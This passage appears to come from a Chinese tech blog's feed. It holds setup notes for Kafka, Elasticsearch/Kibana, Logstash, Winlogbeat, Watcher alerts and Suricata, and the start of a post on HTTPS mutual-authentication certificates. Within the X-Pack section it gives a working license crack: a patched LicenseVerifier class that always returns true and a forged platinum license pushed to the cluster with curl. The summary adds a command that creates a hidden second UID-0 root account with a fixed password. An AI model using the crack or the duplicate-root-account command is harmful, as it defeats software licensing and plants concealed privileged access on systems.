class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">bin/kafka-topics.sh --delete --zookeeper localhost:2181 --topic test # 标记删除</div><div class="line">bin/zookeeper-shell.sh localhost:2181 # zk 删除</div><div class="line">ls /brokers/topics</div><div class="line">rmr /brokers/topics/test</div></pre></td></tr></table></figure></p><blockquote><p>或者修改server.properties文件参数delete.topic.enable=true</p></blockquote><p>测试</p><p>生产者<br><code>bin/kafka-console-producer.sh --broker-list localhost:9092 --topic test</code></p><p>消费者<br><code>bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic test --from-beginning</code></p><blockquote><p>生产者消费者机器必须写kafka主机名hosts</p></blockquote><h4 id="集群"><a href="#集群" class="headerlink" title="集群"></a>集群</h4><p>zookeeper.properties<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">initLimit=10</div><div class="line">syncLimit=5</div><div class="line">dataDir=/tmp/zookeeper</div><div class="line">clientPort=2181</div><div class="line">maxClientCnxns=0</div><div class="line">server.0=kafka:2888:3888</div><div class="line">server.1=kafka01:2889:3889</div><div class="line">server.2=kafka02:2890:3890</div></pre></td></tr></table></figure></p><p>在dataDir目录设置各自的id<br><code>mkdir -p /tmp/zookeeper/log && echo [server.id] > /tmp/zookeeper/myid</code></p><p>server.properties<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">broker.id=0 # 配置不同的id</div><div class="line">listeners=PLAINTEXT://kafka:9092</div><div class="line">advertised.listeners=PLAINTEXT://kafka:9092</div><div class="line">zookeeper.connect=kafka:2181,kafka01:2181,kafka02:2181</div></pre></td></tr></table></figure></p><p>测试</p><p>创建topic并向任意broker写入消息,从任意broker读取消息。</p><p>创建Topic<br><code>bin/kafka-topics.sh --create --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --replication-factor 3 --partition 3 --topic mytopic</code></p><p>列出topic<br><code>bin/kafka-topics.sh --list --zookeeper localhost:2181</code></p><p>查看Topic<br><code>bin/kafka-topics.sh --describe --zookeeper devkafka01:2181 --topic mytopic</code></p><p>创建生产者<br><code>bin/kafka-console-producer.sh --broker-list devkafka01:9092,devkafka02:9092,devkafka03:9092 --topic mytopic</code></p><p>创建消费者<br><code>bin/kafka-console-consumer.sh --zookeeper devkafka01:2181,devkafka02:2181,devkafka03:2181 --from-beginning --topic mytopic</code></p><h4 id="监控"><a href="#监控" class="headerlink" title="监控"></a>监控</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">#!/bin/bash</div><div class="line">java -cp KafkaOffsetMonitor-assembly-0.3.0-SNAPSHOT.jar \</div><div class="line">com.quantifind.kafka.offsetapp.OffsetGetterWeb \</div><div class="line">--offsetStorage kafka \</div><div class="line">--zk devkafka01,devkafka02,devkafka03 \</div><div class="line">--port 8080 \</div><div class="line">--refresh 10.seconds \</div><div class="line">--retain 1.days</div></pre></td></tr></table></figure><p>nohup ./kom.sh > /dev/null 2>&1 &</p><h4 id="压力测试"><a href="#压力测试" class="headerlink" title="压力测试"></a>压力测试</h4><h3 id="Kibana"><a href="#Kibana" class="headerlink" title="Kibana"></a>Kibana</h3><p>/etc/kibana/kibana.yml</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">server.port: 5601 # kibana 监听端口</div><div class="line">server.host: 0.0.0.0 # 监听ip</div><div class="line">elasticsearch.url: "http://127.0.0.1:9200" # es主节点</div><div class="line">elasticsearch.username: "elastic"</div><div class="line">elasticsearch.password: "changeme"</div></pre></td></tr></table></figure><p>离线安装x-pack</p><p><code>bin/kibana-plugin install file:///tmp/x-pack-5.6.10.zip</code></p><p>service kibana start<br>or<br>nohup bin/kibana &</p><h3 id="图表"><a href="#图表" class="headerlink" title="图表"></a>图表</h3><p>告警类型饼图<br>攻击源地址柱状图<br>访问的url信息</p><h3 id="Grafana"><a href="#Grafana" class="headerlink" title="Grafana"></a>Grafana</h3><h3 id="Beats"><a href="#Beats" class="headerlink" title="Beats"></a>Beats</h3><p>Winlogbeat 5.6.10</p><p>配置<br>winlogbeat.yml<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">#----------------------------- Logstash output --------------------------------</div><div class="line">output.logstash:</div><div class="line"> # The Logstash hosts</div><div class="line"> hosts: ["192.168.200.109:5044"]</div><div class="line"> </div><div class="line">#--------------------------kafka-----------------------------------</div><div class="line">output.kafka:</div><div class="line"> # initial brokers for reading cluster metadata</div><div class="line"> hosts: ["192.168.6.22:9092"]</div><div class="line"> topic: "test"</div></pre></td></tr></table></figure></p><p>Logstash<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> beats {</div><div class="line"> port => 5044</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p>检查配置<br><code>.\winlogbeat.exe -c .\winlogbeat.yml -configtest -e</code></p><p>安装<br><code>PS C:\winlogbeat-5.6.10-windows-x86_64> .\install-service-winlogbeat.ps1</code><br>启动服务<br><code>net start winlogbeat</code></p><h3 id="Flume"><a href="#Flume" class="headerlink" title="Flume"></a>Flume</h3><h3 id="X-Pack"><a href="#X-Pack" class="headerlink" title="X-Pack"></a>X-Pack</h3><p>默认密码<br>username: elastic<br>password: changeme</p><p>破解</p><p>LicenseVerifier.java<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line">package org.elasticsearch.license;</div><div class="line"></div><div class="line">import java.nio.*;</div><div class="line">import java.util.*;</div><div class="line">import java.security.*;</div><div class="line">import org.elasticsearch.common.xcontent.*;</div><div class="line">import org.apache.lucene.util.*;</div><div class="line">import org.elasticsearch.common.io.*;</div><div class="line">import java.io.*;</div><div class="line"></div><div class="line">public class LicenseVerifier</div><div class="line">{</div><div class="line"> public static boolean verifyLicense(final License license, final byte[] encryptedPublicKeyData) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line"></div><div class="line"> public static boolean verifyLicense(final License license) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p><code>javac -cp "/usr/share/elasticsearch/lib/elasticsearch-5.6.10.jar:/usr/share/elasticsearch/lib/lucene-core-6.6.1.jar:/usr/share/elasticsearch/plugins/x-pack/x-pack-5.6.10.jar" LicenseVerifier.java</code></p><p>注册新的license<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">{"license":{"uid":"d3cbbbee-9155-4e1a-a5ed-a7e8940d6564","type":"platinum","issue_date_in_millis":1499299200000,"expiry_date_in_millis":2524579200999,"max_nodes":1000,"issued_to":"guo dalu (eastmoney)","issuer":"Web Form","signature":"AAAAAwAAAA0C9L3AjL50eKgiW55YAAABmC9ZN0hjZDBGYnVyRXpCOW5Bb3FjZDAxOWpSbTVoMVZwUzRxVk1PSmkxaktJRVl5MUYvUWh3bHZVUTllbXNPbzBUemtnbWpBbmlWRmRZb25KNFlBR2x0TXc2K2p1Y1VtMG1UQU9TRGZVSGRwaEJGUjE3bXd3LzRqZ05iLzRteWFNekdxRGpIYlFwYkJiNUs0U1hTVlJKNVlXekMrSlVUdFIvV0FNeWdOYnlESDc3MWhlY3hSQmdKSjJ2ZTcvYlBFOHhPQlV3ZHdDQ0tHcG5uOElCaDJ4K1hob29xSG85N0kvTWV3THhlQk9NL01VMFRjNDZpZEVXeUtUMXIyMlIveFpJUkk2WUdveEZaME9XWitGUi9WNTZVQW1FMG1DenhZU0ZmeXlZakVEMjZFT2NvOWxpZGlqVmlHNC8rWVVUYzMwRGVySHpIdURzKzFiRDl4TmM1TUp2VTBOUlJZUlAyV0ZVL2kvVk10L0NsbXNFYVZwT3NSU082dFNNa2prQ0ZsclZ4NTltbU1CVE5lR09Bck93V2J1Y3c9PQAAAQB2gL4WXN64P0+c5q6TDyhqPllFvkboZMWjzJHid05qCtI86/I0aSsFgYF3AkVA1qoz7UHsjC/xBsoyhuXfmHn6LbsZYXweZ4LsllG8RJ8HH/bBYVTBt+Mag+wXE/QZUS7HnSA8iAReQ7tY//wyuEVrxFDeAI9cgwWN90RoZ3sAgkzGq0jVr2JoUYeYwNJ4GZ2GMDS7GsHBxNWBJVgfDkZXvLya/jOJhaKi2GvW8mIzFp19/FO+t2+ReUkbF3T35nVIZnqFDVhXtOz981By4ArffE8ythlI4X67Nabtzoy87V5gXanBvsSdHiHpYJMrYwn7DU+93Ie6t56Lesjkj//b","start_date_in_millis":1499299200000}}</div></pre></td></tr></table></figure></p><p><code>curl -XPUT -u elastic:changeme 'http://30.3.229.120:9200/_xpack/license?acknowledge=true' -d @l.json</code><br><code>curl -XGET -u elastic:changeme 'http://30.3.229.120:9200/_license'</code></p><h4 id="Watcher"><a href="#Watcher" class="headerlink" title="Watcher"></a>Watcher</h4><p>监控含有alert的日志并发送邮件告警</p><p>配置elasticsearch.yml<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">xpack.notification.email.account:</div><div class="line"> exchange_account:</div><div class="line"> profile: outlook</div><div class="line"> email_defaults:</div><div class="line"> from: user@domain.com</div><div class="line"> smtp:</div><div class="line"> auth: true</div><div class="line"> starttls.enable: false</div><div class="line"> host: mail.domain.com </div><div class="line"> port: 587</div><div class="line"> user: user</div><div class="line"> password: pass</div></pre></td></tr></table></figure></p><p>“event_type”: “alert”,</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div></pre></td><td class="code"><pre><div class="line">{</div><div class="line"> "trigger": {</div><div class="line">// 每间隔5m触发</div><div class="line"> "schedule": {</div><div class="line"> "interval": "5m"</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "input": {</div><div class="line">// 查询结果</div><div class="line"> "search": {</div><div class="line"> "request": {</div><div class="line"> "search_type": "query_then_fetch",</div><div class="line"> "indices": ["logstash-map-2018.07"],</div><div class="line"> "types": [],</div><div class="line"> "body": {</div><div class="line"> "size": 0,</div><div class="line"> "query": {</div><div class="line"> // bool 同时满足两个条件</div><div class="line">"bool" : {</div><div class="line"> "must" : [</div><div class="line"> { "match" : { "event_type": "alert" }},</div><div class="line"> { "range" : { "@timestamp" : { "gte" : "now-1h" }}}</div><div class="line"> ]</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> // 判断acction条件</div><div class="line"> "condition": {</div><div class="line"> "compare": {</div><div class="line"> "ctx.payload.hits.total": {</div><div class="line"> "gte": 10</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> // 执行告警方式</div><div class="line"> "actions": {</div><div class="line"> "my-logging-action": {</div><div class="line"> "logging": {</div><div class="line"> "level": "info",</div><div class="line"> "text": "Fine {{ctx.payload.hits.total}} alerts in last 5m."</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure><p>聚合5m钟内登陆失败用户<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div></pre></td><td class="code"><pre><div class="line">GET logstash-dc01-security-2018.08/_search</div><div class="line">{</div><div class="line"> "size": 1,</div><div class="line"> "query": {</div><div class="line"> "bool" : {</div><div class="line"> "must" : [{ "match" : { "event_id" : 4625 }}],</div><div class="line"> "filter":[{ "range" : { "@timestamp" : { "gte" : "now-1d" }}}]</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "aggs": {</div><div class="line"> "group_by_TargetUserName": {</div><div class="line"> "terms": {</div><div class="line"> "field": "event_data.TargetUserName.keyword"</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">Result:</div><div class="line"></div><div class="line">"aggregations": {</div><div class="line"> "group_by_TargetUserName": {</div><div class="line"> "doc_count_error_upper_bound": 0,</div><div class="line"> "sum_other_doc_count": 0,</div><div class="line"> "buckets": [</div><div class="line"> {</div><div class="line"> "doc_count": 6,</div><div class="line"> "key": "test"</div><div class="line"> },</div><div class="line"> {</div><div class="line"> "doc_count": 2,</div><div class="line"> "key": "test1"</div><div class="line"> },</div><div class="line"> {</div><div class="line"> "doc_count": 1,</div><div class="line"> "key": "admin"</div><div class="line"> }</div><div class="line"> ]</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p>数组<br>ctx.payload.aggregations.group_by_TargetUserName.buckets</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">"condition": {</div><div class="line"> "array_compare": {</div><div class="line"> "ctx.payload.aggregations.group_by_TargetUserName.buckets" : { </div><div class="line"> "path": "doc_count" ,</div><div class="line"> "gte": { </div><div class="line"> "value": 25, </div><div class="line"> "quantifier": "some" </div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure><p>动作</p><p>发送邮件</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">"send_email" : {</div><div class="line">"throttle_period": "15m",</div><div class="line"> "email" : {</div><div class="line"> "to" : "<username>@<domainname>", </div><div class="line">"cc": ["a@<domainname>","b@<domainname>"]</div><div class="line"> "subject" : "Watcher Notification", </div><div class="line"> "body" : "Top10 users:\n{{#ctx.payload.aggregations.topn.buckets}}\n{{key}} {{doc_count}}\n{{/ctx.payload.aggregations.topn.buckets}}",</div><div class="line">"attachments" : {</div><div class="line"> "attached_data" : {</div><div class="line"> "data" : {</div><div class="line"> "format" : "json"</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "priority" : "high"</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure><p>webhook</p><h3 id="Suricata"><a href="#Suricata" class="headerlink" title="Suricata"></a>Suricata</h3><p><a href="https://suricata-ids.org/" target="_blank" rel="external">https://suricata-ids.org/</a></p><p>安装</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">sudo yum -y install gcc libpcap-devel pcre-devel libyaml-devel file-devel \</div><div class="line"> zlib-devel jansson-devel nss-devel libcap-ng-devel libnet-devel tar make \</div><div class="line"> libnetfilter_queue-devel lua-devel</div><div class="line">wget https://www.openinfosecfoundation.org/download/suricata-4.0.4.tar.gz</div><div class="line">tar -zxvf suricata-4.0.4.tar.gz</div><div class="line">cd suricata-4.0.4</div><div class="line">./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-nfqueue --enable-lua</div><div class="line">make & make install</div><div class="line">make install-full</div></pre></td></tr></table></figure><p>suricata -c /etc/suricata/suricata.yaml -i eth1</p><h4 id="更新规则"><a href="#更新规则" class="headerlink" title="更新规则"></a>更新规则</h4><p>pip install suricata-update </p><p>规则源<br><a href="https://www.openinfosecfoundation.org/rules/index.yaml" target="_blank" rel="external">https://www.openinfosecfoundation.org/rules/index.yaml</a></p><p>et/open: <a href="https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz</a><br>et/pro: <a href="https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz</a><br>oisf/trafficid: <a href="https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules" target="_blank" rel="external">https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules</a><br>ptresearch/attackdetection: <a href="https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz" target="_blank" rel="external">https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz</a><br>scwx/malware: <a href="https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz</a><br>scwx/security: <a href="https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz</a><br>sslbl/ssl-fp-blacklist: <a href="https://sslbl.abuse.ch/blacklist/sslblacklist.rules" target="_blank" rel="external">https://sslbl.abuse.ch/blacklist/sslblacklist.rules</a></p><h2 id="日志采集"><a href="#日志采集" class="headerlink" title="日志采集"></a>日志采集</h2><h3 id="Syslog"><a href="#Syslog" class="headerlink" title="Syslog"></a>Syslog</h3><p>syslog日志格式</p><p>WAF</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> syslog {</div><div class="line"> timezone => "Asia/Shanghai"</div><div class="line"> id => "my_plugin_id"</div><div class="line"> port => 514</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">filter {</div><div class="line"> # drop waf_log_wafstat</div><div class="line"> if [severity] == 6 {</div><div class="line"> drop { }</div><div class="line"> }</div><div class="line"> # waf log</div><div class="line"> if [severity] == 3 {</div><div class="line"> grok {</div><div class="line"> match => { "message" => "tag:%{DATA:tag}\s*site_id:%{INT:site_id}\s*protect_id:%{INT:protect_id}\s*dst_ip:%{IPORHOST:dst_ip}\s*dst_port:%{INT:dst_port}\s*src_ip:%{IPORHOST:src_ip}\s*src_port:%{INT:src_port}\s*method:%{DATA:method}\s*domain:%{DATA:domain}\s*uri:%{DATA:uri}\s*alertlevel:%{DATA:alert_level}\s*event_type:%{DATA:event_type}\s*stat_time:%{TIMESTAMP_ISO8601:stat_time}\s*policy_id:%{INT:policy_id}\s*rule_id:%{INT:rule_id}\s*action:%{DATA:action}\s*block:%{DATA:block}\s*block_info:%{DATA:block_info}\s*http:%{DATA:http}\s*alertinfo:%{DATA:alertinfo}\s*proxy_info:%{DATA:proxy_info}\s*characters:%{DATA:characters}\s*count_num:%{INT:count_num}\s*protocol_type:%{DATA:protocol_type}\s*wci:%{DATA:wci}\s*wsi:%{DATA:wsi}\s*country:%{DATA:country}"}</div><div class="line"> }</div><div class="line"> mutate {</div><div class="line"> remove_field => ["message"]</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">output {</div><div class="line"> elasticsearch {</div><div class="line"> hosts => ["http://develk01:9200","http://develk02:9200","http://develk03:9200"]</div><div class="line"> user => "elastic"</div><div class="line"> password => "changeme"</div><div class="line"> index => "waf-cs-syslog-217"</div><div class="line"> }</div><div class="line"> stdout { codec => rubydebug }</div><div class="line">}</div></pre></td></tr></table></figure><h4 id="sysmon"><a href="#sysmon" class="headerlink" title="sysmon"></a>sysmon</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line">beats {</div><div class="line">port => 5044</div><div class="line">}</div><div class="line">}</div><div class="line">filter{</div><div class="line">mutate { </div><div class="line">split => ["message","\r"]</div><div class="line">remove_field => ["message","beat","@version"]</div><div class="line">lowercase => ["host"] # index must be lower case</div><div class="line">}</div><div class="line">}</div><div class="line"></div><div class="line">"source_name" => "Microsoft-Windows-Security-Auditing"</div><div class="line">"Microsoft-Windows-Sysmon"</div><div class="line"></div><div class="line">output {</div><div class="line"></div><div class="line">elasticsearch {</div><div class="line"> hosts => ["http://develk01:9200"]</div><div class="line"> index => "logstash-%{[host]}-%{+YYYY.MM.dd}"</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h2 id="指南"><a href="#指南" class="headerlink" title="指南"></a>指南</h2><p><a href="https://elkguide.elasticsearch.cn/logstash/get-start/install.html" target="_blank" rel="external">https://elkguide.elasticsearch.cn/logstash/get-start/install.html</a></p>
<h2 id="架构"><a href="#架构" class="headerlink" title="架构"></a>架构</h2><p>Elasticsearch 实时全文搜索和分析引擎<br>Logstash 日志收集,分析,过滤<br>Kibana 数据图形化展示</p>
<p><img src="http://static.open-open.com/news/uploadImg/20150716/20150716205233_183.png" alt=""></p>
<p>Server(producer) Beats -&gt; Zookeeper Kafka topic -&gt; (按照业务功能拆分ELK cluster) Logstash (consumer) -&gt; ES -&gt; Kibana (日志敏感信息泄露)</p>
<p>服务器<br>/etc/hosts<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">30.3.229.120 develk01</div><div class="line">30.3.229.121 develk02</div><div class="line">30.3.229.122 develk03</div><div class="line">30.3.229.123 devkafka01</div><div class="line">30.3.229.124 devkafka02</div><div class="line">30.3.229.125 devkafka03</div></pre></td></tr></table></figure></p>
<p>添加root用户<br>useradd -u 0 -o -g root -G root -d /root/ user1<br>echo “user1”:”passw0rD” | chpasswd</p>
</summary>
</entry>
<entry>
<title>HTTPS单向双向认证</title>
<link href="http://ruos.org/2018/11/02/HTTPS%E5%8D%95%E5%90%91%E5%8F%8C%E5%90%91%E8%AE%A4%E8%AF%81/"/>
<id>http://ruos.org/2018/11/02/HTTPS单向双向认证/</id>
<published>2018-11-02T08:55:06.000Z</published>
<updated>2020-04-29T04:53:52.450Z</updated>
<content type="html"><![CDATA[<ul><li>JKS:数字证书库。JKS里有KeyEntry和CertEntry,在库里的每个Entry都是靠别名(alias)来识别的。</li><li>P12:是PKCS12的缩写。同样是一个存储私钥的证书库,由.jks文件导出的,用户在PC平台安装,用于标示用户的身份。</li><li>CER:俗称数字证书,目的就是用于存储公钥证书,任何人都可以获取这个文件 。</li><li>BKS:Android平台专用证书库格式。</li></ul><p>crt转bks</p><p>下载Bouncy Castle,将该文件放到Java\jdk1.8.0_20\jre\lib\ext目录下,或者使用-providerpath指定路径。<br><a href="http://www.bouncycastle.org/latest_releases.html" target="_blank" rel="external">http://www.bouncycastle.org/latest_releases.html</a></p><p>keytool -importcert -v -trustcacerts -alias mykey -file githubcom.crt -keystore keystore.bks -storetype BKS -providerclass org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath bcprov-jdk15on-1.47.jar -storepass testing</p><h1 id="单向认证"><a href="#单向认证" class="headerlink" title="单向认证"></a>单向认证</h1><h3 id="SSL-Pinning"><a href="#SSL-Pinning" class="headerlink" title="SSL Pinning"></a>SSL Pinning</h3><p>在客户端预置服务器公钥证书或者指纹,在和HTTPS请求获取的服务器证书做对比的方式。</p><h1 id="双向验证"><a href="#双向验证" class="headerlink" title="双向验证"></a>双向验证</h1><p>什么是双向认证?举个栗子。</p><blockquote><p>土匪:蘑菇,你哪路?什么价?(什么人?到哪里去?)<br>杨子荣:哈!想啥来啥,想吃奶来了妈妈,想娘家的人,孩子他舅舅来了。(找同行)<br>杨子荣:拜见三爷!<br>土匪:天王盖地虎!(你好大的胆!敢来气你的祖宗?)<br>杨子荣:宝塔镇河妖!(要是那样,叫我从山上摔死,掉河里淹死。)</p></blockquote><p>简单来说,当两个互不认识的人交易的时候,在A说出口令之后,B能说出只有A和B知道的口令。</p><h3 id="生成证书"><a href="#生成证书" class="headerlink" title="生成证书"></a>生成证书</h3><p>1) 生成客户端keystore</p><p><code>keytool -genkeypair -alias client -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore client.jks</code></p><p>2) 生成服务端keystore</p><p><code>keytool -genkeypair -alias server -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore server.keystore</code></p><p>注意:CN必须与IP地址匹配,否则需要修改host</p><p>3) 导出客户端证书</p><p><code>keytool -export -alias client -file client.cer -keystore client.jks -storepass 123456</code></p><p>4) 导出服务端证书</p><p><code>keytool -export -alias server -file server.cer -keystore server.keystore -storepass 123456</code></p><p>5) 证书交换</p><p>将客户端证书导入服务端keystore中,再将服务端证书导入客户端keystore中,一个keystore可以导入多个证书,生成证书列表。</p><p>生成客户端信任证书库(由服务端证书生成的证书库):<br><code>keytool -import -v -alias server -file server.cer -keystore truststore.jks -storepass 123456</code></p><p>将客户端证书导入到服务器证书库(使得服务器信任客户端证书):<br><code>keytool -import -v -alias client -file client.cer -keystore server.keystore -storepass 123456</code></p><p>6) 生成Android识别的BKS库文件</p><p>使用portecle将client.jks和truststore.jks转换成bks格式,放到android客户端的assert目录下。</p><h3 id="配置tomcat"><a href="#配置tomcat" class="headerlink" title="配置tomcat"></a>配置tomcat</h3><p>修改server.xml文件,配置8443端口 </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><Connector port="8443" protocol="org.apache.coyote.http11.Http11Protocol"</div><div class="line"> maxThreads="150" SSLEnabled="true" scheme="https" secure="true"</div><div class="line"> clientAuth="true" sslProtocol="TLS"</div><div class="line"> keystoreFile="${catalina.base}\conf\server.keystore" keystorePass="123456" </div><div class="line"> truststoreFile="${catalina.base}\conf\server.keystore" truststorePass="123456" /></div></pre></td></tr></table></figure><p>由于没有客户端证书,浏览器访问将被拒绝。</p><p><img src="https://i.imgur.com/X0cRtx6.png" alt=""></p><h3 id="安卓客户端"><a 